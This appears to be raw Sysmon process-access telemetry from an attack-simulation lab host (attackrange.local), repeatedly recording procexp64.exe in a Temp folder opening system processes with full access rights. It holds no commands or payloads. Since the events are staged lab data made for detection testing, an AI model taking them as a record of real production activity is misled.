15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792603Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792602Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792601Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792600Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792599Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792598Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792727Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792726Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792725Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792724Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792723Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792722Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792721Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792720Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792719Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792718Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792717Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792716Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792715Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792714Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792713Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792712Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792711Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792710Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792709Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792708Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792707Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792706Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792705Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792704Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792703Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792702Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792701Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792700Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792699Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792698Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792697Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 